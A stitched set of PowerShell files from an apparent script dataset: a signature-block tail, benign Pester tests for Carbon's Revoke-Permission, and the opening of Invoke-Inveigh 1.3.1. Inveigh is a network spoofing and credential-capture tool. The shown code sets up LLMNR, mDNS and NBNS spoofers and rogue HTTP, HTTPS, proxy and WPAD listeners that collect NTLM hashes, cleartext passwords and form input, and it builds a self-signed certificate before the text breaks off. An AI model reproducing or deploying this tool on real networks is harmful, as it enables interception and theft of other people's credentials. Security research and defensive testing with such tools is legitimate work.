# ODQyLTRCRTYtQzI5QTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
# dmljZaIjCgEBMAcGBSsOAwIaAxUAQqIfIYljHUbNoY0/wjhXRn/sSA2ggYMwgYCk
# fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
# AOl0RNYwIhgPMjAyNDAyMTIxNTE4NDZaGA8yMDI0MDIxMzE1MTg0NlowdzA9Bgor
# BgEEAYRZCgQBMS8wLTAKAgUA6XRE1gIBADAKAgEAAgIBRwIB/zAHAgEAAgISkjAK
# AgUA6XWWVgIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIB
# AAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAEHMH8eDwQ5UEvYI
# N/9Kq6PkMHM1J4YpUps7G5vN9ACEiNOyRzo1u51vINRVtW35RkXd/FwSJxwy2FsB
# v/D0WmPV4Zm4NoWqDnB/Dpb4oBYpgmXmXTcFHbPKZldyI3/XMMJxnSLiJ6zmzbCt
# mhPIujUMoFKQpSrn7wOflyWjp5aaMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTACEzMAAAHajtXJWgDREbEAAQAAAdowDQYJYIZIAWUD
# BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B
# CQQxIgQgHWP2tiH0yjnlUAtiKatNwtVzODUCJUPbua8FuhJUm8IwgfoGCyqGSIb3
# DQEJEAIvMYHqMIHnMIHkMIG9BCAipaNpYsDvnqTe95Dj1C09020I5ljibrW/ndIC
# Oxg9xjCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u
# MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp
# b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB
# 2o7VyVoA0RGxAAEAAAHaMCIEIDnRr0iTxo7N39RYkJQjNKgSUzMlqo106/A0RY2l
# 63UJMA0GCSqGSIb3DQEBCwUABIICACQe5K1ghrV3+H3NP1NbjsgU77sh5ItLIV3s
# HX0w5i7NIWiKcIpqHt321H0qLA5t/XUdMNoPADW56NRZAKTxxO4uldCRGVg+R3tM
# TOwH39SbnP1R3kYBrAjhSX7jL6EkvHWWLL/FWApSe/q8E5y55QYVswIm4kEE4mrF
# GoZXrM4XBNuiGsIb1djdKZquY/y7dZ7niR6xgCToqOg+1vZD3VkvKvO1iu+xXKMf
# EFK8+mm8Ua+wft7UxRuneNfr+j2YowTIayZMJfMKXkQ2iDaumL87/Wgky1xeibgL
# LqKndjK7Ac16yMgxlCaXyKngNcMT5En5au/RTF3/PC0MinlErFbj3PPmgFCLUczg
# xldFEMCrOodvH30MpQPn/p+QY2DOBHVLx2bqscPu5Q9i4lMGIxKVrk11LU/LytTi
# T77UJEuAJHHd23AerI1kSJ0PZPNmD1piwFeSvnAJT+gDNRaf7DJZ/c36VQMyqMnY
# A4cZo25xzr5OXjd9H1Ukyr0Yw0G7PBcdLhmypq0wV8dOGxaXpFVSeMgv6ZAdB6Q0
# apjdbdCgo8m8YbwKB8WtEHrgfBHRrrBkKCIsW/Fmy2yG1mLPLxpPcCB9CRzyaIIm
# XTUQ4nwogfHrPoWr8kfrnI8bgqc1bg/Ft2fvFncL/XjxI8zG/J0Lgpl9KtJIB0Ck
# VHSuwApR
# SIG # End signature block
|
combined_dataset/train/non-malicious/1215.ps1
|
1215.ps1
|
$Path = $null
$user = 'CarbonGrantPerms'
$containerPath = $null
$privateKeyPath = Join-Path -Path $PSScriptRoot -ChildPath 'Cryptography\CarbonTestPrivateKey.pfx' -Resolve
& (Join-Path -Path $PSScriptRoot -ChildPath 'Initialize-CarbonTest.ps1' -Resolve)
$credential = New-Credential -UserName $user -Password 'a1b2c3d4!'
Install-User -Credential $credential -Description 'User for Carbon Grant-Permission tests.'
Describe 'Revoke-Permission.when user has multiple access control entries on an item' {
$path = $TestDrive.FullName
Grant-Permission -Path $path -Identity $credential.UserName -Permission 'Read'
$perm = Get-Permission -Path $path -Identity $credential.UserName
Mock -CommandName 'Get-Permission' -ModuleName 'Carbon' -MockWith { $perm ; $perm }.GetNewClosure()
$Global:Error.Clear()
Revoke-Permission -Path $path -Identity $credential.UserName
It 'should not write any errors' {
$Global:Error | Should BeNullOrEmpty
}
It 'should remove permission' {
Carbon\Get-Permission -Path $path -Identity $credential.UserName | Should BeNullOrEmpty
}
}
Describe 'Revoke-Permission' {
BeforeEach {
$Path = @([IO.Path]::GetTempFileName())[0]
Grant-Permission -Path $Path -Identity $user -Permission 'FullControl'
}
AfterEach {
if( Test-Path $Path )
{
Remove-Item $Path -Force
}
}
It 'should revoke permission' {
Revoke-Permission -Path $Path -Identity $user
$Global:Error.Count | Should Be 0
(Test-Permission -Path $Path -Identity $user -Permission 'FullControl') | Should Be $false
}
It 'should not revoke inherited permissions' {
Get-Permission -Path $Path -Inherited |
Where-Object { $_.IdentityReference -notlike ('*{0}*' -f $user) } |
ForEach-Object {
$result = Revoke-Permission -Path $Path -Identity $_.IdentityReference
$Global:Error.Count | Should Be 0
$result | Should BeNullOrEmpty
(Test-Permission -Identity $_.IdentityReference -Path $Path -Inherited -Permission $_.FileSystemRights) | Should Be $true
}
}
It 'should handle revoking non existent permission' {
Revoke-Permission -Path $Path -Identity $user
(Test-Permission -Path $Path -Identity $user -Permission 'FullControl') | Should Be $false
Revoke-Permission -Path $Path -Identity $user
$Global:Error.Count | Should Be 0
(Test-Permission -Path $Path -Identity $user -Permission 'FullControl') | Should Be $false
}
It 'should resolve relative path' {
Push-Location -Path (Split-Path -Parent -Path $Path)
try
{
Revoke-Permission -Path ('.\{0}' -f (Split-Path -Leaf -Path $Path)) -Identity $user
(Test-Permission -Path $Path -Identity $user -Permission 'FullControl') | Should Be $false
}
finally
{
Pop-Location
}
}
It 'should support what if' {
Revoke-Permission -Path $Path -Identity $user -WhatIf
(Test-Permission -Path $Path -Identity $user -Permission 'FullControl') | Should Be $true
}
It 'should revoke permission on registry' {
$regKey = 'hkcu:\TestRevokePermissions'
New-Item $regKey
try
{
Grant-Permission -Identity $user -Permission 'ReadKey' -Path $regKey
$result = Revoke-Permission -Path $regKey -Identity $user
$result | Should BeNullOrEmpty
(Test-Permission -Path $regKey -Identity $user -Permission 'ReadKey') | Should Be $false
}
finally
{
Remove-Item $regKey
}
}
It 'should revoke local machine private key permissions' {
$cert = Install-Certificate -Path $privateKeyPath -StoreLocation LocalMachine -StoreName My
try
{
$certPath = Join-Path -Path 'cert:\LocalMachine\My' -ChildPath $cert.Thumbprint
Grant-Permission -Path $certPath -Identity $user -Permission 'FullControl'
(Get-Permission -Path $certPath -Identity $user) | Should Not BeNullOrEmpty
Revoke-Permission -Path $certPath -Identity $user
$Global:Error.Count | Should Be 0
(Get-Permission -Path $certPath -Identity $user) | Should BeNullOrEmpty
}
finally
{
Uninstall-Certificate -Thumbprint $cert.Thumbprint -StoreLocation LocalMachine -StoreName My
}
}
It 'should revoke current user private key permissions' {
$cert = Install-Certificate -Path $privateKeyPath -StoreLocation CurrentUser -StoreName My
try
{
$certPath = Join-Path -Path 'cert:\CurrentUser\My' -ChildPath $cert.Thumbprint
Grant-Permission -Path $certPath -Identity $user -Permission 'FullControl' -WhatIf
$Global:Error.Count | Should Be 0
(Get-Permission -Path $certPath -Identity $user) | Should BeNullOrEmpty
}
finally
{
Uninstall-Certificate -Thumbprint $cert.Thumbprint -StoreLocation CurrentUser -StoreName My
}
}
It 'should support what if when revoking private key permissions' {
$cert = Install-Certificate -Path $privateKeyPath -StoreLocation LocalMachine -StoreName My
try
{
$certPath = Join-Path -Path 'cert:\LocalMachine\My' -ChildPath $cert.Thumbprint
Grant-Permission -Path $certPath -Identity $user -Permission 'FullControl'
(Get-Permission -Path $certPath -Identity $user) | Should Not BeNullOrEmpty
Revoke-Permission -Path $certPath -Identity $user -WhatIf
$Global:Error.Count | Should Be 0
(Get-Permission -Path $certPath -Identity $user) | Should Not BeNullOrEmpty
}
finally
{
Uninstall-Certificate -Thumbprint $cert.Thumbprint -StoreLocation LocalMachine -StoreName My
}
}
}
|
combined_dataset/train/non-malicious/4282.ps1
|
4282.ps1
|
function Invoke-Inveigh
{
[CmdletBinding()]
param
(
[parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
[parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
[parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "",
[parameter(Mandatory=$false)][Array]$SpooferIPsReply = "",
[parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "",
[parameter(Mandatory=$false)][Array]$WPADDirectHosts = "",
[parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "Firefox",
[parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
[parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
[parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
[parameter(Mandatory=$false)][Int]$LLMNRTTL = "30",
[parameter(Mandatory=$false)][Int]$mDNSTTL = "120",
[parameter(Mandatory=$false)][Int]$NBNSTTL = "165",
[parameter(Mandatory=$false)][Int]$NBNSBruteForcePause = "",
[parameter(Mandatory=$false)][Int]$ProxyPort = "8492",
[parameter(Mandatory=$false)][Int]$RunCount = "",
[parameter(Mandatory=$false)][Int]$RunTime = "",
[parameter(Mandatory=$false)][Int]$WPADPort = "",
[parameter(Mandatory=$false)][Int]$SpooferLearningDelay = "",
[parameter(Mandatory=$false)][Int]$SpooferLearningInterval = "30",
[parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS",
[parameter(Mandatory=$false)][String]$HTTPContentType = "text/html",
[parameter(Mandatory=$false)][String]$HTTPDefaultFile = "",
[parameter(Mandatory=$false)][String]$HTTPDefaultEXE = "",
[parameter(Mandatory=$false)][String]$HTTPResponse = "",
[parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh",
[parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost",
[parameter(Mandatory=$false)][String]$NBNSBruteForceHost = "WPAD",
[parameter(Mandatory=$false)][String]$WPADResponse = "",
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LogOutput = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$mDNS = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADDirectFile = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N",
[parameter(Mandatory=$false)][ValidateSet("Auto","Y","N")][String]$ElevatedPrivilege = "Auto",
[parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$HTTPAuth = "NTLM",
[parameter(Mandatory=$false)][ValidateSet("QU","QM")][Array]$mDNSTypes = @("QU"),
[parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"),
[parameter(Mandatory=$false)][ValidateSet("Basic","NTLM","NTLMNoESS")][String]$ProxyAuth = "NTLM",
[parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
[parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$WPADAuth = "NTLM",
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "",
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "",
[parameter(Mandatory=$false)][Switch]$Inspect,
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
if ($invalid_parameter)
{
Write-Output "Error:$($invalid_parameter) is not a valid parameter"
throw
}
$inveigh_version = "1.3.1"
if(!$IP)
{
$IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
}
if(!$SpooferIP)
{
$SpooferIP = $IP
}
if($HTTPDefaultFile -or $HTTPDefaultEXE)
{
if(!$HTTPDir)
{
Write-Output "Error:You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE"
throw
}
}
if($WPADIP -or $WPADPort)
{
if(!$WPADIP)
{
Write-Output "Error:You must specify a -WPADPort to go with -WPADIP"
throw
}
if(!$WPADPort)
{
Write-Output "Error:You must specify a -WPADIP to go with -WPADPort"
throw
}
}
if($NBNSBruteForce -eq 'Y' -and !$NBNSBruteForceTarget)
{
Write-Output "Error:You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce"
throw
}
if(!$FileOutputdirectory)
{
$output_directory = $PWD.Path
}
else
{
$output_directory = $FileOutputdirectory
}
if(!$inveigh)
{
$global:inveigh = [HashTable]::Synchronized(@{})
$inveigh.cleartext_list = New-Object System.Collections.ArrayList
$inveigh.IP_capture_list = New-Object System.Collections.ArrayList
$inveigh.log = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
$inveigh.POST_request_list = New-Object System.Collections.ArrayList
$inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
$inveigh.valid_host_list = New-Object System.Collections.ArrayList
}
if($inveigh.running)
{
Write-Output "Error:Invoke-Inveigh is already running, use Stop-Inveigh"
throw
}
if($HTTP_listener.IsListening -and !$inveigh.relay_running)
{
$HTTP_listener.Stop()
$HTTP_listener.Close()
}
if(!$inveigh.relay_running)
{
$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
$inveigh.console_queue = New-Object System.Collections.ArrayList
$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
$inveigh.log_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
$inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList
$inveigh.status_queue = New-Object System.Collections.ArrayList
$inveigh.console_input = $true
$inveigh.console_output = $false
$inveigh.file_output = $false
$inveigh.HTTPS_existing_certificate = $false
$inveigh.HTTPS_force_certificate_delete = $false
$inveigh.log_output = $true
$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
$inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"
}
if($ElevatedPrivilege -eq 'Auto')
{
$elevated_privilege = [Bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")
}
else
{
if($ElevatedPrivilege -eq 'Y')
{
$elevated_privilege = $true
}
else
{
$elevated_privilege = $false
}
}
if($StartupChecks -eq 'Y')
{
$firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
if($HTTP -eq 'Y')
{
$HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort "
}
if($HTTPS -eq 'Y')
{
$HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPSPort "
}
if($Proxy -eq 'Y')
{
$proxy_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort "
}
if($LLMNR -eq 'Y' -and !$elevated_privilege)
{
$LLMNR_port_check = netstat -anp UDP | findstr /C:"0.0.0.0:5355 "
}
if($mDNS -eq 'Y' -and !$elevated_privilege)
{
$mDNS_port_check = netstat -anp UDP | findstr /C:"0.0.0.0:5353 "
}
}
if(!$elevated_privilege)
{
if($HTTPS -eq 'Y')
{
Write-Output "Error:-HTTPS requires elevated privileges"
throw
}
if($SpooferLearning -eq 'Y')
{
Write-Output "Error:-SpooferLearning requires elevated privileges"
throw
}
$NBNS = "Y"
$SMB = "N"
}
$inveigh.hostname_spoof = $false
$inveigh.running = $true
if($StatusOutput -eq 'Y')
{
$inveigh.status_output = $true
}
else
{
$inveigh.status_output = $false
}
if($OutputStreamOnly -eq 'Y')
{
$inveigh.output_stream_only = $true
}
else
{
$inveigh.output_stream_only = $false
}
if($Inspect)
{
if($elevated_privilege)
{
$LLMNR = "N"
$mDNS = "N"
$NBNS = "N"
$HTTP = "N"
$HTTPS = "N"
$Proxy = "N"
}
else
{
$HTTP = "N"
$HTTPS = "N"
$Proxy = "N"
}
}
if($Tool -eq 1)
{
$inveigh.tool = 1
$inveigh.output_stream_only = $true
$inveigh.newline = ""
$ConsoleOutput = "N"
}
elseif($Tool -eq 2)
{
$inveigh.tool = 2
$inveigh.output_stream_only = $true
$inveigh.console_input = $false
$inveigh.newline = "`n"
$LogOutput = "N"
$ShowHelp = "N"
switch ($ConsoleOutput)
{
'Low'
{
$ConsoleOutput = "Low"
}
'Medium'
{
$ConsoleOutput = "Medium"
}
default
{
$ConsoleOutput = "Y"
}
}
}
else
{
$inveigh.tool = 0
$inveigh.newline = ""
}
$inveigh.status_queue.Add("Inveigh $inveigh_version started at $(Get-Date -format 's')") > $null
if($FileOutput -eq 'Y')
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh $inveigh_version started") > $null
}
if($LogOutput -eq 'Y')
{
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh started") > $null
$inveigh.log_output = $true
}
else
{
$inveigh.log_output = $false
}
if($ElevatedPrivilege -eq 'Y' -or $elevated_privilege)
{
$inveigh.status_queue.Add("Elevated Privilege Mode = Enabled") > $null
}
else
{
$inveigh.status_queue.Add("Elevated Privilege Mode = Disabled") > $null
}
if($firewall_status)
{
$inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
$firewall_rules = New-Object -comObject HNetCfg.FwPolicy2
$firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}"
if($firewall_powershell)
{
$inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null
}
}
$inveigh.status_queue.Add("Primary IP Address = $IP") > $null
if($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y')
{
$inveigh.status_queue.Add("LLMNR/mDNS/NBNS Spoofer IP Address = $SpooferIP") > $null
}
if($LLMNR -eq 'Y')
{
if($elevated_privilege -or !$LLMNR_port_check)
{
$inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null
$inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null
$LLMNR_response_message = "- response sent"
}
else
{
$LLMNR = "N"
$inveigh.status_queue.Add("LLMNR Spoofer Disabled Due To In Use Port 5355") > $null
}
}
else
{
$inveigh.status_queue.Add("LLMNR Spoofer = Disabled") > $null
$LLMNR_response_message = "- LLMNR spoofer is disabled"
}
if($mDNS -eq 'Y')
{
if($elevated_privilege -or !$mDNS_port_check)
{
$mDNSTypes_output = $mDNSTypes -join ","
if($mDNSTypes.Count -eq 1)
{
$inveigh.status_queue.Add("mDNS Spoofer For Type $mDNSTypes_output = Enabled") > $null
}
else
{
$inveigh.status_queue.Add("mDNS Spoofer For Types $mDNSTypes_output = Enabled") > $null
}
$inveigh.status_queue.Add("mDNS TTL = $mDNSTTL Seconds") > $null
$mDNS_response_message = "- response sent"
}
else
{
$mDNS = "N"
$inveigh.status_queue.Add("mDNS Spoofer Disabled Due To In Use Port 5353") > $null
}
}
else
{
$inveigh.status_queue.Add("mDNS Spoofer = Disabled") > $null
$mDNS_response_message = "- mDNS spoofer is disabled"
}
if($NBNS -eq 'Y')
{
$NBNSTypes_output = $NBNSTypes -join ","
$NBNS_response_message = "- response sent"
if($NBNSTypes.Count -eq 1)
{
$inveigh.status_queue.Add("NBNS Spoofer For Type $NBNSTypes_output = Enabled") > $null
}
else
{
$inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null
}
}
else
{
$inveigh.status_queue.Add("NBNS Spoofer = Disabled") > $null
$NBNS_response_message = "- NBNS spoofer is disabled"
}
if($NBNSBruteForce -eq 'Y')
{
$inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $NBNSBruteForceTarget") > $null
$inveigh.status_queue.Add("NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null
$inveigh.status_queue.Add("NBNS Brute Force Spoofer Hostname = $NBNSBruteForceHost") > $null
if($NBNSBruteForcePause)
{
$inveigh.status_queue.Add("NBNS Brute Force Pause = $NBNSBruteForcePause Seconds") > $null
}
}
if($NBNS -eq 'Y' -or $NBNSBruteForce -eq 'Y')
{
$inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null
}
if($SpooferLearning -eq 'Y' -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
$inveigh.status_queue.Add("Spoofer Learning = Enabled") > $null
if($SpooferLearningDelay -eq 1)
{
$inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minute") > $null
}
elseif($SpooferLearningDelay -gt 1)
{
$inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minutes") > $null
}
if($SpooferLearningInterval -eq 1)
{
$inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minute") > $null
}
elseif($SpooferLearningInterval -eq 0)
{
$inveigh.status_queue.Add("Spoofer Learning Interval = Disabled") > $null
}
elseif($SpooferLearningInterval -gt 1)
{
$inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minutes") > $null
}
}
if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
$inveigh.status_queue.Add("Spoofer Hosts Reply = " + ($SpooferHostsReply -join ",")) > $null
}
if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
$inveigh.status_queue.Add("Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ",")) > $null
}
if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
$inveigh.status_queue.Add("Spoofer IPs Reply = " + ($SpooferIPsReply -join ",")) > $null
}
if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
$inveigh.status_queue.Add("Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ",")) > $null
}
if($SpooferRepeat -eq 'N')
{
$inveigh.spoofer_repeat = $false
$inveigh.status_queue.Add("Spoofer Repeating = Disabled") > $null
}
else
{
$inveigh.spoofer_repeat = $true
}
if($SMB -eq 'Y' -and $elevated_privilege)
{
$inveigh.status_queue.Add("SMB Capture = Enabled") > $null
}
else
{
$inveigh.status_queue.Add("SMB Capture = Disabled") > $null
}
if($HTTP -eq 'Y')
{
if($HTTP_port_check)
{
$HTTP = "N"
$inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port $HTTPPort") > $null
}
else
{
if($HTTPIP -ne '0.0.0.0')
{
$inveigh.status_queue.Add("HTTP IP = $HTTPIP") > $null
}
if($HTTPPort -ne 80)
{
$inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null
}
$inveigh.status_queue.Add("HTTP Capture = Enabled") > $null
}
}
else
{
$inveigh.status_queue.Add("HTTP Capture = Disabled") > $null
}
if($HTTPS -eq 'Y')
{
if($HTTPS_port_check)
{
$HTTPS = "N"
$inveigh.HTTPS = $false
$inveigh.status_queue.Add("HTTPS Capture Disabled Due To In Use Port $HTTPSPort") > $null
}
else
{
try
{
$inveigh.certificate_issuer = $HTTPSCertIssuer
$inveigh.certificate_CN = $HTTPSCertSubject
$inveigh.status_queue.Add("HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null
$inveigh.status_queue.Add("HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null
$certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
if(!$certificate_check)
{
$certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
$certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
$certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
$certificate_issuer_distinguished_name.Encode("CN=" + $inveigh.certificate_issuer, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
$certificate_key = new-object -com "X509Enrollment.CX509PrivateKey"
$certificate_key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider"
$certificate_key.KeySpec = 2
$certificate_key.Length = 2048
$certificate_key.MachineContext = 1
$certificate_key.Create()
$certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId"
$certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1")
$certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1"
$certificate_enhanced_key_usage_OID.add($certificate_server_auth_OID)
$certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage"
$certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID)
$certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate"
$certificate.InitializeFromPrivateKey(2,$certificate_key,"")
$certificate.Subject = $certificate_distinguished_name
$certificate.Issuer = $certificate_issuer_distinguished_name
$certificate.NotBefore = (get-date).AddDays(-271)
$certificate.NotAfter = $certificate.NotBefore.AddDays(824)
$certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId
$certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256")
$certificate.HashAlgorithm = $certificate_hash_algorithm_OID
$certificate.X509Extensions.Add($certificate_enhanced_key_usage_extension)
$certificate_basic_constraints = new-object -com "X509Enrollment.CX509ExtensionBasicConstraints"
$certificate_basic_constraints.InitializeEncode("true",1)
$certificate.X509Extensions.Add($certificate_basic_constraints)
$certificate.Encode()
$certificate_enrollment = new-object -com "X509Enrollment.CX509Enrollment"
$certificate_enrollment.InitializeFromRequest($certificate)
$certificate_data = $certificate_enrollment.CreateRequest(0)
$certificate_enrollment.InstallResponse(2,$certificate_data,0,"")
